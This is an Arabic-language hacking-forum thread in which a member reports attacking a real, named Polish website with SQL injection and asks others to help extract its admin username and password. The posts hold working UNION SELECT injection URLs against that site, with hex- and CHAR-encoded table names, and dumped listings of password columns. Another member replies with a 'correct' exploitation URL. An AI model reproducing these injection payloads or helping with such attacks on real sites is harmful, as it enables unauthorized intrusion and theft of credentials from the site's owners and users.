|
شباب ميدو + فلكانو + كل المحترفين في ثغرة SQL خشو وشوفي هل خطواتي صح ولا لا 1 مرفق السلام عليكم ورحمة الله وبركاته اعزايئ اول شي حاب اشــكر كثيرا طبعا الاخ فلكانو على الدوره الجباره والي علمتني كل شي بخصوص ثغرة الــSQL وكم مره اشتكيت من فك الهاش والحمد الله انحلت معايا وكم مره صادفتني مشاكل بخصوص الحقن في هذي الثغره اما اليوم باذن الله معد فيه غلط وقبل فتره نزلت موضوع في هذا القسم بخصوص عمود الباس وعمود اليوزر يعني الحقنه حقتي غلط المهم بعد ما طورت مهارتي وكل شي تمام حــبيت اخترق موقع فيه هذي الثغره لوحدي طبعا بس يوم طلعت الباس غلط طبعا والادمن غلط رحت على درس اخوي فلكانو الي هوا الوصول الى العمود الصحيح في الحقنه واتبعت الخطوات وطلعت النتيجه كالتالي بعد ما نشف ريقي طبعا طبعا ارفقت ملف txt ابغاكم تحملوه وتشوفون خطواتي صح ولا لا + ابي واحد منكم لانو لين الحين ما طلعت الادمن والباس الصحيح ابيكم تطلعولي هيا وفي نفس الوقت تقولون ليا هل خطواتي صح او لا في النهايه شكرا على تحمل مواضيعي الي زي كذا ثانيا اشكر اخوي فلكانو وميدو وكل الاعضاء الي قد شافو مشاكلي وساعدوني في حلها يعطيكم الف عافيا في الختام حاب اقلكم تحياتي hank00sh |
سأجيب عنك بعد ان ارى خطواتك مشكور كان المفروض تكتب اسم الموقع فى داخل ملف النصى فى الاسفل عودة من جديد اراك قد قمت بتطبيق خطوات الاخ كلاشنكوف فأين المشكلة |
اخــي ميدو بخصوص الخطوات طبعا راح اعطيك اخر شي وصلتلو في الحقنه والي هوا المسار هذا http://www.logoserwis.pl/artykul.php...e+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- تمام هذا عشان ااطلع عمود الباس بس طلعت الباس بس ما نفع معايا رحت ودورت ثاني طلعت المسار هذا http://www.logoserwis.pl/artykul.php...e+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- تمام طبعا هذا المسار عشان اطلع ناس ثانين او اطلع الباس وورد الصحيح طيب طلعلي التالي forum_forums:forum_pass:telix2 nuke_bannerclient:passwd:telix2 nuke_users:pass:telix2 phpads_affiliates:password:telix2 phpads_clients:clientpassword:telix2 ats_etc:admin_password:telix4 ats_sites:password:telix4 nuke_users:pass:telix4 nuke_users:changepass:telix4 nuke_users1:pass:telix4 nuke_users1:changepass:telix4 nuke_xmb_members:password:telix4 ___________________________________ رحت خمت على اول واحد فيهم الي هوا هذا forum_forums:forum_pass:telix2 بس ما عرفت اطلع شي يعني ما طلعت الباس والادمن مزبوطين انا راح اوريك ايش طلعلي ثواني هههاي http://www.logoserwis.pl/artykul.php...ere+table_name =0x666f72756d5f666f72756d73-- هذا اخر شي وصلت له في الحقنه وباقي اوريك النتيجه forum_forums:forum_id:telix2 forum_forums:forum_name:telix2 forum_forums:forum_desc:telix2 forum_forums:forum_access:telix2 forum_forums:forum_moderator:telix2 forum_forums:cat_id:telix2 forum_forums:forum_type:telix2 forum_forums:forum_pass:telix2 زي منت شايف هذي النتيجه طيب باقي اخر خطوه نشوف مع انو شغلو كلو ولا طلعت الباس والادمن الصح اكمل لو خشيت على هذا المسار >>>> url]http://www.logoserwis.pl/artykul.php?sid=-6294+union+select+1,2,3,4,5,concat(forum_name,0x3a ,forum_pass),7,8,9,10+from+forum_forums-- راح يجيك التالي اقصد النتيجه Telefony وكملت الين الاخير وارفقت هذا التكست عشان تشوفون وهذي الخطوات الي استخدمتها انا والله يخلي اخوي فلكانو طبعا ما وقفت على واحد رحت كملت على هذي كلها forum_forums:forum_pass:telix2 nuke_bannerclient:passwd:telix2 nuke_users:pass:telix2 phpads_affiliates:password:telix2 phpads_clients:clientpassword:telix2 ats_etc:admin_password:telix4 ats_sites:password:telix4 nuke_users:pass:telix4 nuke_users:changepass:telix4 nuke_users1:pass:telix4 nuke_users1:changepass:telix4 nuke_xmb_members:password:telix4 وهذي نهايه خطواتي يا اخ ميدو |
مرحبا يا اخي انت استغللت بشكل خاطىء هاذا هو الاستغلال الصحيح http://www.logoserwis.pl/artykul.php...0x66616b7379-- كما ترى ظهرت كل الاعمدة ولكنني لم استطع فهم لغتها فهي ليست بالانجليزية |
اقتباس:
ثانيا لو استغليت غلط راح يجيني غلط الـــSQL لاكن استغالالي صح في صح ومتاكد منو |
|
| الساعة الآن 07:55 PM |
[ vBspiders.Com Network ]